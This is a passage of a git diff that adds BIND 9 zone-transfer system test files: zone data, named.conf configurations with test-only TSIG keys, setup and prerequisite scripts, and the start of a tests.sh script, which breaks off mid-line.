MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgiWCn/GxHhai6V AuHAoNUz4YoU1tVfSCSqQYn6//11U6Nld80jEeC8aTrO+KKmCaY= +sink01.example. 3600 IN SINK 1 0 0 +sink02.example. 3600 IN SINK 8 0 2 l4ik +smimea.example. 3600 IN SMIMEA 1 1 2 92003BA34942DC74152E2F2C408D29ECA5A520E7F2E06BB944F4DCA3 46BAF63C1B177615D466F6C4B71C216A50292BD58C9EBDD2F74E38FE 51FFD48C43326CBC +spf01.example. 3600 IN SPF "v=spf1 -all" +spf02.example. 3600 IN SPF "v=spf1" " -all" +srv01.example. 3600 IN SRV 0 0 0 . +srv02.example. 3600 IN SRV 65535 65535 65535 old-slow-box.example. +sshfp01.example. 3600 IN SSHFP 4 2 C76D8329954DA2835751E371544E963EFDA099080D6C58DD2BFD9A31 6E162C83 +sshfp02.example. 3600 IN SSHFP 1 2 BF29468C83AC58CCF8C85AB7B3BEB054ECF1E38512B8353AB36471FA 88961DCC +svcb0.example. 3600 IN SVCB 0 example.net. +svcb1.example. 3600 IN SVCB 1 . port=60 +ta.example. 3600 IN TA 30795 1 1 310D27F4D82C1FC2400704EA9939FE6E1CEAA3B9 +talink0.example. 3600 IN TALINK . talink1.example. +talink1.example. 3600 IN TALINK talink0.example. talink2.example. +talink2.example. 3600 IN TALINK talink2.example. . +tlsa.example. 3600 IN TLSA 1 1 2 92003BA34942DC74152E2F2C408D29ECA5A520E7F2E06BB944F4DCA3 46BAF63C1B177615D466F6C4B71C216A50292BD58C9EBDD2F74E38FE 51FFD48C43326CBC +txt01.example. 3600 IN TXT "foo" +txt02.example. 3600 IN TXT "foo" "bar" +txt03.example. 3600 IN TXT "foo" +txt04.example. 3600 IN TXT "foo" "bar" +txt05.example. 3600 IN TXT "foo bar" +txt06.example. 3600 IN TXT "foo bar" +txt07.example. 3600 IN TXT "foo bar" +txt08.example. 3600 IN TXT "foo\010bar" +txt09.example. 3600 IN TXT "foo\010bar" +txt10.example. 3600 IN TXT "foo bar" +txt11.example. 3600 IN TXT "\"foo\"" +txt12.example. 3600 IN TXT "\"foo\"" +txt13.example. 3600 IN TXT "foo;" +txt14.example. 3600 IN TXT "foo;" +txt15.example. 3600 IN TXT "bar\\;" +uid01.example. 3600 IN UID \# 1 02 +uinfo01.example. 3600 IN UINFO \# 1 01 +uri01.example. 3600 IN URI 10 20 "https://www.isc.org/" +uri02.example. 3600 IN URI 30 40 "https://www.isc.org/HolyCowThisSureIsAVeryLongURIRecordIDontEvenKnowWhatSomeoneWouldEverWantWithSuchAThingButTheSpecificationRequiresThatWesupportItSoHereWeGoTestingItLaLaLaLaLaLaLaSeriouslyThoughWhyWouldYouEvenConsiderUsingAURIThisLongItSeemsLikeASillyIdeaButEnhWhatAreYouGonnaDo/" +uri03.example. 3600 IN URI 30 40 "" +wks01.example. 3600 IN WKS 10.0.0.1 6 0 1 2 21 23 +wks02.example. 3600 IN WKS 10.0.0.1 17 0 1 2 53 +wks03.example. 3600 IN WKS 10.0.0.2 6 65535 +x2501.example. 3600 IN X25 "123456789" +zonemd01.example. 3600 IN ZONEMD 2019020700 1 1 C220B8A6ED5728A971902F7E3D4FD93ADEEA88B0453C2E8E8C863D46 5AB06CF34EB95B266398C98B59124FA239CB7EEB +zonemd02.example. 3600 IN ZONEMD 2019020700 1 2 08CFA1115C7B948C4163A901270395EA226A930CD2CBCF2FA9A5E6EB 85F37C8A4E114D884E66F176EAB121CB02DB7D652E0CC4827E7A3204 F166B47E5613FD27 +8f1tmio9avcom2k0frp92lgcumak0cad.example. 3600 IN NSEC3 1 0 10 D2CF0294C020CE6C 8FPNS2UCT7FBS643THP2B77PEQ77K6IU A NS SOA MX AAAA RRSIG DNSKEY NSEC3PARAM +kcd3juae64f9c5csl1kif1htaui7un0g.example. 3600 IN NSEC3 1 0 10 D2CF0294C020CE6C KD5MN2M20340DGO0BL7NTSB8JP4BSC7E +mr5ukvsk1l37btu4q7b1dfevft4hkqdk.example. 3600 IN NSEC3 1 0 10 D2CF0294C020CE6C MT38J6VG7S0SN5G17MCUF6IQIKFUAJ05 A AAAA RRSIG +example. 86400 IN SOA ns2.example. hostmaster.example. 1397051953 5 5 1814400 3600 diff --git a/bin/tests/system/xfer/knowngood.mapped b/bin/tests/system/xfer/knowngood.mapped new file mode 100644 index 0000000..5fcd00b --- /dev/null +++ b/bin/tests/system/xfer/knowngood.mapped @@ -0,0 +1,26 @@ + +; <<>> DiG 9.10.2-P3 <<>> -p 5300 axfr mapped @10.53.0.3 +;; global options: +cmd +mapped. 3600 IN SOA . . 0 0 0 2147483647 0 +example.aa. 3600 IN A 1.2.3.4 +example1.aa. 3600 IN A 1.2.3.4 +example.bb. 3600 IN A 1.2.3.4 +example1.bb. 3600 IN A 1.2.3.4 +example.com. 3600 IN A 1.2.3.4 +example1.com. 3600 IN A 1.2.3.4 +bar.dd. 3600 IN A 1.2.3.4 +foo.ee. 3600 IN A 1.2.3.4 +foo.ff. 3600 IN A 1.2.3.4 +foo.gg. 3600 IN A 1.2.3.4 +foo.hh. 3600 IN A 1.2.3.4 +foo.ii. 3600 IN A 1.2.3.4 +foo.jj. 3600 IN A 1.2.3.4 +foo.kk. 3600 IN A 1.2.3.4 +foo.ll. 3600 IN A 1.2.3.4 +mapped. 3600 IN NS . +mapped. 3600 IN SOA . . 0 0 0 2147483647 0 +;; Query time: 4 msec +;; SERVER: 10.53.0.3#5300(10.53.0.3) +;; WHEN: Tue Feb 16 14:38:25 EST 2016 +;; XFR size: 18 records (messages 1, bytes 468) + diff --git a/bin/tests/system/xfer/ns1/axfr-too-big.db b/bin/tests/system/xfer/ns1/axfr-too-big.db new file mode 100644 index 0000000..37987a6 --- /dev/null +++ b/bin/tests/system/xfer/ns1/axfr-too-big.db @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ IN SOA . . 0 0 0 0 0 +@ IN NS . +$GENERATE 1-29 host$ A 1.2.3.$ diff --git a/bin/tests/system/xfer/ns1/ixfr-too-big.db.in b/bin/tests/system/xfer/ns1/ixfr-too-big.db.in new file mode 100644 index 0000000..c192316 --- /dev/null +++ b/bin/tests/system/xfer/ns1/ixfr-too-big.db.in @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ IN SOA . . 0 0 0 0 0 +@ IN NS ns1 +@ IN NS ns6 +ns1 IN A 10.53.0.1 +ns6 IN A 10.53.0.6 +$GENERATE 1-25 host$ A 1.2.3.$ diff --git a/bin/tests/system/xfer/ns1/named.conf.in b/bin/tests/system/xfer/ns1/named.conf.in new file mode 100644 index 0000000..3ff6cdf --- /dev/null +++ b/bin/tests/system/xfer/ns1/named.conf.in @@ -0,0 +1,61 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; +}; + +zone "." { + type primary; + file "root.db"; +}; + +zone "secondary" { + type primary; + file "sec.db"; +}; + +zone "edns-expire" { + type primary; + file "edns-expire.db"; +}; + +zone "axfr-too-big" { + type primary; + file "axfr-too-big.db"; +}; + +zone "ixfr-too-big" { + type primary; + allow-update { any; }; + file "ixfr-too-big.db"; +}; + +zone "xfer-stats" { + type primary; + file "xfer-stats.db"; +}; diff --git a/bin/tests/system/xfer/ns1/root.db b/bin/tests/system/xfer/ns1/root.db new file mode 100644 index 0000000..58a675c --- /dev/null +++ b/bin/tests/system/xfer/ns1/root.db @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example. NS ns2.example. +ns2.example. A 10.53.0.2 + +tsigzone. NS ns2.tsigzone. +ns2.tsigzone. A 10.53.0.2 diff --git a/bin/tests/system/xfer/ns1/xfer-stats.db b/bin/tests/system/xfer/ns1/xfer-stats.db new file mode 100644 index 0000000..42e1c9c --- /dev/null +++ b/bin/tests/system/xfer/ns1/xfer-stats.db @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA . . 0 0 0 0 0 +@ NS . +$GENERATE 1-10000 $ TXT $ diff --git a/bin/tests/system/xfer/ns2/mapped.db.in b/bin/tests/system/xfer/ns2/mapped.db.in new file mode 100644 index 0000000..d928d69 --- /dev/null +++ b/bin/tests/system/xfer/ns2/mapped.db.in @@ -0,0 +1,28 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +mapped. 3600 IN SOA . . 0 0 0 2147483647 0 +example.aa. 3600 IN A 1.2.3.4 +example1.aa. 3600 IN A 1.2.3.4 +example.bb. 3600 IN A 1.2.3.4 +example1.bb. 3600 IN A 1.2.3.4 +example.com. 3600 IN A 1.2.3.4 +example1.com. 3600 IN A 1.2.3.4 +bar.dd. 3600 IN A 1.2.3.4 +foo.ee. 3600 IN A 1.2.3.4 +foo.ff. 3600 IN A 1.2.3.4 +foo.gg. 3600 IN A 1.2.3.4 +foo.hh. 3600 IN A 1.2.3.4 +foo.ii. 3600 IN A 1.2.3.4 +foo.jj. 3600 IN A 1.2.3.4 +foo.kk. 3600 IN A 1.2.3.4 +foo.ll. 3600 IN A 1.2.3.4 +mapped. 3600 IN NS . diff --git a/bin/tests/system/xfer/ns2/named.conf.in b/bin/tests/system/xfer/ns2/named.conf.in new file mode 100644 index 0000000..fbde9c1 --- /dev/null +++ b/bin/tests/system/xfer/ns2/named.conf.in @@ -0,0 +1,74 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + ixfr-from-differences yes; + check-integrity no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +key tsigzone. { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +acl tzkey { + key tsigzone.; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type primary; + file "example.db"; +}; + +zone "tsigzone" { + type primary; + file "tsigzone.db"; + allow-transfer { tzkey; }; +}; + +zone "secondary" { + type secondary; + file "sec.db"; + primaries { 10.53.0.1; }; + masterfile-format text; +}; + +zone "mapped" { + type secondary; + file "mapped.db"; + masterfile-format text; + primaries { 10.53.0.100; }; +}; diff --git a/bin/tests/system/xfer/ns2/sec.db.in b/bin/tests/system/xfer/ns2/sec.db.in new file mode 100644 index 0000000..7978598 --- /dev/null +++ b/bin/tests/system/xfer/ns2/sec.db.in @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 5 + +@ IN SOA ns1 hostmaster 1 5 5 5 5 +@ NS ns1 +ns1 A 10.53.0.1 +a01 A 1.1.1.1 +a02 A 255.255.255.255 + diff --git a/bin/tests/system/xfer/ns3/named.conf.in b/bin/tests/system/xfer/ns3/named.conf.in new file mode 100644 index 0000000..5fc0183 --- /dev/null +++ b/bin/tests/system/xfer/ns3/named.conf.in @@ -0,0 +1,79 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +key tsigzone. { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type secondary; + primaries { 10.53.0.2; }; + file "example.bk"; +}; + +zone "primary" { + type secondary; + primaries { 10.53.0.6; }; + file "primary.bk"; +}; + +server 10.53.0.2 { + keys { tsigzone.; }; +}; + +zone "tsigzone" { + type secondary; + primaries { 10.53.0.2; }; + file "tsigzone.bk"; + allow-transfer { key tsigzone.; }; +}; + +zone "mapped" { + type secondary; + primaries { 10.53.0.2; }; + masterfile-format map; + file "mapped.bk"; +}; + +zone "xfer-stats" { + type secondary; + primaries { 10.53.0.1; }; + file "xfer-stats.bk"; +}; diff --git a/bin/tests/system/xfer/ns4/named.conf.base b/bin/tests/system/xfer/ns4/named.conf.base new file mode 100644 index 0000000..8e77d0c --- /dev/null +++ b/bin/tests/system/xfer/ns4/named.conf.base @@ -0,0 +1,49 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + blackhole { none; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +key unused_key. { + secret "1234abcd8765"; + algorithm hmac-md5; +}; + +key tsig_key. { + secret "LSAnCU+Z"; + algorithm hmac-md5; +}; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type primary; + file "root.db"; +}; diff --git a/bin/tests/system/xfer/ns4/root.db.in b/bin/tests/system/xfer/ns4/root.db.in new file mode 100644 index 0000000..29ee0ec --- /dev/null +++ b/bin/tests/system/xfer/ns4/root.db.in @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 0 SOA . . 0 0 0 0 0 +@ 0 NS . +@ 0 A 10.53.0.4 diff --git a/bin/tests/system/xfer/ns6/named.conf.in b/bin/tests/system/xfer/ns6/named.conf.in new file mode 100644 index 0000000..636400c --- /dev/null +++ b/bin/tests/system/xfer/ns6/named.conf.in @@ -0,0 +1,69 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.6 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.6; + notify-source 10.53.0.6; + transfer-source 10.53.0.6; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.6; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + ixfr-from-differences primary; + check-integrity no; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "primary" { + type primary; + file "primary.db"; +}; + +zone "secondary" { + type secondary; + notify no; + primaries { 10.53.0.1; }; + file "sec.bk"; +}; + +zone "edns-expire" { + type secondary; + primaries { 10.53.0.1; }; + file "edns-expire.bk"; +}; + +zone "axfr-too-big" { + type secondary; + max-records 30; + primaries { 10.53.0.1; }; + file "axfr-too-big.bk"; +}; + +zone "ixfr-too-big" { + type secondary; + max-records 30; + primaries { 10.53.0.1; }; + file "ixfr-too-big.bk"; +}; diff --git a/bin/tests/system/xfer/ns7/named.conf.in b/bin/tests/system/xfer/ns7/named.conf.in new file mode 100644 index 0000000..9bd92b3 --- /dev/null +++ b/bin/tests/system/xfer/ns7/named.conf.in @@ -0,0 +1,54 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.7 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.7; + notify-source 10.53.0.7; + transfer-source 10.53.0.7; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.7; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + ixfr-from-differences secondary; + check-integrity no; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "primary2" { + type primary; + file "primary2.db"; +}; + +zone "secondary" { + type secondary; + primaries { 10.53.0.1; }; + file "sec.bk"; +}; + +zone "edns-expire" { + type secondary; + primaries { 10.53.0.6; }; + file "edns-expire.bk"; +}; diff --git a/bin/tests/system/xfer/ns8/example.db b/bin/tests/system/xfer/ns8/example.db new file mode 100644 index 0000000..8e8ccb9 --- /dev/null +++ b/bin/tests/system/xfer/ns8/example.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ SOA mname1. . ( + 2000062101 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.1 + +$INCLUDE large.db +$INCLUDE small.db diff --git a/bin/tests/system/xfer/ns8/named.conf.in b/bin/tests/system/xfer/ns8/named.conf.in new file mode 100644 index 0000000..22b3272 --- /dev/null +++ b/bin/tests/system/xfer/ns8/named.conf.in @@ -0,0 +1,46 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.8 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.8; + notify-source 10.53.0.8; + transfer-source 10.53.0.8; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.8; }; + listen-on-v6 { none; }; + recursion no; + notify no; + transfer-message-size 1024; +}; + +key key1. { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +acl tzkey { + key key1.; +}; + +zone "example." { + type primary; + file "example.db"; + allow-transfer { tzkey; }; +}; diff --git a/bin/tests/system/xfer/prereq.sh b/bin/tests/system/xfer/prereq.sh new file mode 100644 index 0000000..b262501 --- /dev/null +++ b/bin/tests/system/xfer/prereq.sh @@ -0,0 +1,35 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if $PERL -e 'use Net::DNS;' 2>/dev/null +then + if $PERL -e 'use Net::DNS; die if ($Net::DNS::VERSION >= 0.69 && $Net::DNS::VERSION <= 0.74);' 2>/dev/null + then + : + else + echo_i "Net::DNS versions 0.69 to 0.74 have bugs that cause this test to fail: please update." >&2 + exit 1 + fi +else + echo_i "This test requires the Net::DNS library." >&2 + exit 1 +fi + +if ! $PERL -e 'use Digest::HMAC;' 2>/dev/null +then + echo_i "This test requires the Digest::HMAC Perl module." >&2 + exit 1 +fi diff --git a/bin/tests/system/xfer/setup.sh b/bin/tests/system/xfer/setup.sh new file mode 100644 index 0000000..3180a7f --- /dev/null +++ b/bin/tests/system/xfer/setup.sh @@ -0,0 +1,44 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL ../genzone.sh 1 6 7 >ns1/sec.db +$SHELL ../genzone.sh 1 6 7 >ns1/edns-expire.db +$SHELL ../genzone.sh 2 3 >ns2/example.db +$SHELL ../genzone.sh 2 3 >ns2/tsigzone.db +$SHELL ../genzone.sh 6 3 >ns6/primary.db +$SHELL ../genzone.sh 7 >ns7/primary2.db + +cp -f ns4/root.db.in ns4/root.db +$PERL -e 'for ($i=0;$i<10000;$i++){ printf("x%u 0 in a 10.53.0.1\n", $i);}' >> ns4/root.db + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns6/named.conf.in ns6/named.conf +copy_setports ns7/named.conf.in ns7/named.conf +copy_setports ns8/named.conf.in ns8/named.conf + +copy_setports ns4/named.conf.base ns4/named.conf + +cp ns2/sec.db.in ns2/sec.db +touch -t 200101010000 ns2/sec.db + +cp ns2/mapped.db.in ns2/mapped.db + +$PERL -e 'for ($i=0;$i<4096;$i++){ printf("name%u 259200 A 1.2.3.4\nname%u 259200 TXT \"Hello World %u\"\n", $i, $i, $i);}' > ns8/small.db +$PERL -e 'printf("large IN TYPE45234 \\# 48000 "); for ($i=0;$i<16*3000;$i++) { printf("%02x", $i % 256); } printf("\n");' > ns8/large.db + +cp -f ns1/ixfr-too-big.db.in ns1/ixfr-too-big.db diff --git a/bin/tests/system/xfer/tests.sh b/bin/tests/system/xfer/tests.sh new file mode 100755 index 0000000..607d68a --- /dev/null +++ b/bin/tests/system/xfer/tests.sh @@ -0,0 +1,547 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp +noadd +nosea +nostat +noquest +nocomm +nocmd -p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +status=0 +n=0 + +n=$((n+1)) +echo_i "testing basic zone transfer functionality (from primary) ($n)" +tmp=0 +$DIG $DIGOPTS example. @10.53.0.2 axfr > dig.out.ns2.test$n || tmp=1 +grep "^;" dig.out.ns2.test$n | cat_i +digcomp dig1.good dig.out.ns2.test$n || tmp=1 +if test $tmp != 0 ; then echo_i "failed"; fi +status=$((status+tmp)) + +n=$((n+1)) +echo_i "testing basic zone transfer functionality (from secondary) ($n)" +tmp=0 +# +# Spin to allow the zone to transfer. +# +wait_for_xfer () { + $DIG $DIGOPTS example. @10.53.0.3 axfr > dig.out.ns3.test$n || return 1 + grep "^;" dig.out.ns3.test$n > /dev/null && return 1 + return 0 +} +retry_quiet 25 wait_for_xfer || tmp=1 +grep "^;" dig.out.ns3.test$n | cat_i +digcomp dig1.good dig.out.ns3.test$n || tmp=1 +if test $tmp != 0 ; then echo_i "failed"; fi +status=$((status+tmp)) + +n=$((n+1)) +echo_i "testing TSIG signed zone transfers ($n)" +tmp=0 +$DIG $DIGOPTS tsigzone. @10.53.0.2 axfr -y tsigzone.:1234abcd8765 > dig.out.ns2.test$n || tmp=1 +grep "^;" dig.out.ns2.test$n | cat_i + +# +# Spin to allow the zone to transfer. +# +wait_for_xfer_tsig () { + $DIG $DIGOPTS tsigzone. @10.53.0.3 axfr -y tsigzone.:1234abcd8765 > dig.out.ns3.test$n || return 1 + grep "^;" dig.out.ns3.test$n > /dev/null && return 1 + return 0 +} +retry_quiet 25 wait_for_xfer_tsig || tmp=1 +grep "^;" dig.out.ns3.test$n | cat_i +digcomp dig.out.ns2.test$n dig.out.ns3.test$n || tmp=1 +if test $tmp != 0 ; then echo_i "failed"; fi +status=$((status+tmp)) + +echo_i "reload servers for in preparation for ixfr-from-differences tests" + +rndc_reload ns1 10.53.0.1 +rndc_reload ns2 10.53.0.2 +rndc_reload ns3 10.53.0.3 +rndc_reload ns6 10.53.0.6 +rndc_reload ns7 10.53.0.7 + +sleep 2 + +echo_i "updating primary zones for ixfr-from-differences tests" + +$PERL -i -p -e ' + s/0\.0\.0\.0/0.0.0.1/; + s/1397051952/1397051953/ +' ns1/sec.db + +rndc_reload ns1 10.53.0.1 + +$PERL -i -p -e ' + s/0\.0\.0\.0/0.0.0.1/; + s/1397051952/1397051953/ +' ns2/example.db + +rndc_reload ns2 10.53.0.2 + +$PERL -i -p -e ' + s/0\.0\.0\.0/0.0.0.1/; + s/1397051952/1397051953/ +' ns6/primary.db + +rndc_reload ns6 10.53.0.6 + +$PERL -i -p -e ' + s/0\.0\.0\.0/0.0.0.1/; + s/1397051952/1397051953/ +' ns7/primary2.db + +rndc_reload ns7 10.53.0.7 + +sleep 3 + +n=$((n+1)) +echo_i "testing zone is dumped after successful transfer ($n)" +tmp=0 +$DIG $DIGOPTS +noall +answer +multi @10.53.0.2 \ + secondary. soa > dig.out.ns2.test$n || tmp=1 +grep "1397051952 ; serial" dig.out.ns2.test$n > /dev/null 2>&1 || tmp=1 +grep "1397051952 ; serial" ns2/sec.db > /dev/null 2>&1 || tmp=1 +if test $tmp != 0 ; then echo_i "failed"; fi +status=$((status+tmp)) + +n=$((n+1)) +echo_i "testing ixfr-from-differences yes; ($n)" +tmp=0 + +echo_i "wait for reloads..." +wait_for_reloads() ( + $DIG $DIGOPTS @10.53.0.6 +noall +answer soa primary > 